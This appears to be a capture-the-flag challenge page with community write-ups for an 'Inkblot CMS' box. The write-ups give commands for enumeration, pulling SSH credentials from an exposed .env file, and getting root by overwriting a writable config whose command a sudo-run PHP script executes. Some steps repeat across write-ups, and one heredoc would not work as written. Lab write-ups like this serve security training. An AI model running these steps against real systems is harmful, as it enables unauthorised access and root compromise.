RatCTF
Inkblot runs an internal CMS built by someone who trusted their logs a little too much. The file inclusion is right there. What you put in the request is what ends up in the log. What ends up in the log ends up on the page.
Community
Short, stage-specific nudges — directional, spoiler-light, no exact commands.
No community hints yet — be the first to add one!
Community
The initial step was service enumeration to identify exposed services on the target.
nmap -sV -p 30591,30592 45.79.202.95
Based on the challenge description mentioning an internal CMS, the web application became the primary attack surface.
After accessing the web application, content discovery was performed to identify hidden files and directories.
ffuf -u http://45.79.202.95:30592/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt
The scan revealed an exposed .env file.
To verify its contents:
curl http://45.79.202.95:30592/.env
SSH_USER=webdev
SSH_PASS=<redacted>
Sensitive credentials were stored inside a publicly accessible environment file, resulting in credential disclosure and providing a direct path to initial access.
Using the leaked credentials, SSH access was obtained
ssh webdev@45.79.202.95 -p 30591
Authentication was successful and a shell was obtained as the webdev user.
After obtaining access, the user flag was retrieved.
cat user.txt
Output:
flag{REDACTED}
The next step was to identify available sudo privileges.
sudo -l
text
(root) NOPASSWD: /usr/bin/php /opt/webdev/report.php
This indicated that the current user could execute the PHP reporting script as root without supplying a password.
---
## 6. Source Code Analysis
The privileged script was reviewed to understand its behavior.
bash
cat /opt/webdev/report.php
Relevant code:
php
require_once '/opt/webdev/config.php';
$output = shell_exec($REPORT_CMD)
### Observation
The script executes the contents of `$REPORT_CMD` using `shell_exec()`. Since the value is imported from an external configuration file, the next step was to investigate whether that file could be modified.
---
## 7. Writable Configuration File
Writable files within the application directory were identified.
find /opt/webdev -type f -writable 2>/dev/null
Result:
/opt/webdev/config.php
File permissions:
ls -l /opt/webdev/config.php
-rw-rw-r-- 1 webdev webdev config.php
### Security Issue
The configuration file controlling the command executed by the root-owned script was writable by the low-privileged user. This created a privilege escalation path because arbitrary commands could be injected and later executed as root.
---
## 8. Exploitation
The configuration file was modified to replace the existing command.
```bash
cat > /opt/webdev/config.php << EOF
<?php
\$REPORT_CMD = "id";
EOF
The privileged script was then executed.
sudo /usr/bin/php /opt/webdev/report.php
Output:
uid=0(root) gid=0(root) groups=0(root)
This confirmed that commands supplied through the configuration file were executed with root privileges.
To demonstrate full system compromise, the command was updated to read the root flag.
cat > /opt/webdev/config.php << EOF
<?php
$REPORT_CMD = "cat /root/root.txt";
EOF
Executing the script again:
sudo /usr/bin/php /opt/webdev/report.php
Output:
flag{REDACTED}
Root access was successfully achieved.
The privilege escalation was caused by two independent security weaknesses:
The combination of these issues allowed arbitrary command execution as root, resulting in complete system compromise.
Credential leakage via exposed .env file
Login successful using leaked credentials.
Attacker can modify root-executed command
We overwrite config:
cat > /opt/webdev/config.php << EOF
<?php
$REPORT_CMD = "cat /root/root.txt";
EOF
Step 2: Trigger sudo script
sudo /usr/bin/php /opt/webdev/report.php
9. Root Flag Retrieval
Output:
[report] Running: cat /root/root.txt
flag{.........}
Challenge Description: A forgotten internal CMS exposes sensitive configuration data. Enumerate the application, obtain initial access, and abuse a privileged reporting tool to gain root access.
The initial scan reveals two open ports: 30592 (HTTP) and 30591 (SSH). Since the challenge description references a forgotten search backend and internal documentation platform, the web application becomes the primary target.
Service Enumeration:
nmap -sV -p 30591,30592 45.79.209.127
Results:
- OpenSSH 9.2p1
- Apache httpd 2.4.67
Web Fingerprinting:
whatweb http://45.79.209.127:30592
Result:
Inkblot CMS
Directory Enumeration:
gobuster dir -u http://45.79.209.127:30592 \
-w /usr/share/seclists/Discovery/Web-Content/common.txt \
-x php,txt,html,json
Analyzing the Output:
Gobuster reveals an exposed .env file:
/.env (Status: 200)
Retrieving Sensitive Configuration Data:
curl http://45.79.209.127:30592/.env
Result:
SSH_USER=w...v
SSH_PASS=I....!
Initial Access:
Use the exposed credentials to authenticate via SSH.
ssh -p 30591 webdev@45.79.209.127
Claiming the User Flag:
cat ~/user.txt
User Flag:
flag{...._...._...}
After obtaining a shell as webdev, enumerate sudo permissions.
Checking Sudo Permissions:
sudo -l
Result:
(root) NOPASSWD: /usr/bin/php /opt/webdev/report.php
Inspecting the Privileged Script:
cat /opt/webdev/report.php
require_once '/opt/webdev/config.php';
echo "[report] Running: {$REPORT_CMD}\n";
$output = shell_exec($REPORT_CMD);
echo $output;
Checking File Permissions:
ls -l /opt/webdev/
Result:
-rw-rw-r-- 1 webdev webdev config.php
-rwxr-xr-x 1 root root report.php
The script is executed as root through sudo, but it loads a configuration file that is writable by the unprivileged user.
Inspecting the Configuration File:
cat /opt/webdev/config.php
<?php
$REPORT_CMD = "df -h";
Exploitation:
Replace the command executed by the report generator.
cat > /opt/webdev/config.php << 'EOF'
<?php
$REPORT_CMD = "cat /root/root.txt";
EOF
Execute the Report as Root:
sudo /usr/bin/php /opt/webdev/report.php
Output:
flag{...._...._...}
Root Flag:
flag{...._...._...}
.env files should never be publicly accessible through the web server.shell_exec() should never execute user-controlled or user-modifiable input.